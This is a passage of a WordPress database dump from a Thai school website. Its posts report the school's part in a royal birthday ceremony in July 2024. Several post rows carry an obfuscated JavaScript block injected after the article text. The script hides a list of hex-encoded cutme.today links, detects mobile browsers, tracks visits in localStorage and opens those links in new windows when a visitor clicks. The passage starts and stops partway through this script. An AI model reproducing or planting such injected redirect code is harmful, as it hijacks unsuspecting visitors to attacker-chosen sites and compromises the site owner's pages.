\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','453-revision-v1','','','2024-08-01 21:01:11','2024-08-01 14:01:11','',453,'http://pakhaeng.ssk.in.th/?p=455',0,'revision','',0),
(456,1,'2024-08-01 21:02:12','2024-08-01 14:02:12','<!-- wp:paragraph -->\n<p><strong>เนื่องในโอกาพระราชพิธีมหามงคลเฉลิมพระชนพรรษา 6 รอบ</strong> <strong>28 กรกฎาคม 2567</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>วันที่ 28 กรกฎาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ เข้าร่วมกิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสพระราชพิธีมหามงคลเฉลิมพระชนมพรรษา 6 รอบ 28 กรกฎาคม 2567 ณ หอประชุมที่ว่าการอำเภอโนนคูณ อำเภอโนนคูณ จังหวัดศรีสะเกษ โดยได้ร่วมทำพิธีเจริญพระพุทธมนต์ ทำบุญตักบาตรถวายเป็นพระราชกุศล พิธีถวายสัตย์ปฏิญาณเพื่อเป็นข้าราชการที่ดีและพลังของแผ่นดินและพิธีลงนามถวายพระพร และพิธีถวายราชสักการะและจุดเทียนถวายพระพรชัยมงคล กิจกรรมในครั้งนี้ เพื่อน้อมรำลึกในพระมหากรุณาธิคุณ และแสดงความจงรักภักดีต่อสถาบันชาติ ศาสนา และพระมหากษัตริย์ อีกทั้งเพื่อเสริมสร้างความรักความสามัคคีแก่ปวงชนชาวไทยที่มีสถาบันพระมหากษัตริย์เป็นศูนย์รวมใจอีกด้วย</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":457,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/28-67-724x1024.png\" alt=\"\" class=\"wp-image-457\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว','','publish','closed','closed','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%89%e0%b8%a5%e0%b8%b4%e0%b8%a1%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b8%a2%e0%b8%a3%e0%b8%95%e0%b8%b4-2','','','2024-08-01 21:02:13','2024-08-01 14:02:13','',0,'http://pakhaeng.ssk.in.th/?p=456',0,'post','',0),
(457,1,'2024-08-01 21:02:02','2024-08-01 14:02:02','','28-67','','inherit','','closed','','28-67-2','','','2024-08-01 21:02:02','2024-08-01 14:02:02','',456,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/28-67.png',0,'attachment','image/png',0),
(458,1,'2024-08-01 21:02:12','2024-08-01 14:02:12','<!-- wp:paragraph -->\n<p><strong>เนื่องในโอกาพระราชพิธีมหามงคลเฉลิมพระชนพรรษา 6 รอบ</strong> <strong>28 กรกฎาคม 2567</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>วันที่ 28 กรกฎาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ เข้าร่วมกิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสพระราชพิธีมหามงคลเฉลิมพระชนมพรรษา 6 รอบ 28 กรกฎาคม 2567 ณ หอประชุมที่ว่าการอำเภอโนนคูณ อำเภอโนนคูณ จังหวัดศรีสะเกษ โดยได้ร่วมทำพิธีเจริญพระพุทธมนต์ ทำบุญตักบาตรถวายเป็นพระราชกุศล พิธีถวายสัตย์ปฏิญาณเพื่อเป็นข้าราชการที่ดีและพลังของแผ่นดินและพิธีลงนามถวายพระพร และพิธีถวายราชสักการะและจุดเทียนถวายพระพรชัยมงคล กิจกรรมในครั้งนี้ เพื่อน้อมรำลึกในพระมหากรุณาธิคุณ และแสดงความจงรักภักดีต่อสถาบันชาติ ศาสนา และพระมหากษัตริย์ อีกทั้งเพื่อเสริมสร้างความรักความสามัคคีแก่ปวงชนชาวไทยที่มีสถาบันพระมหากษัตริย์เป็นศูนย์รวมใจอีกด้วย</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":457,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/28-67-724x1024.png\" alt=\"\" class=\"wp-image-457\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 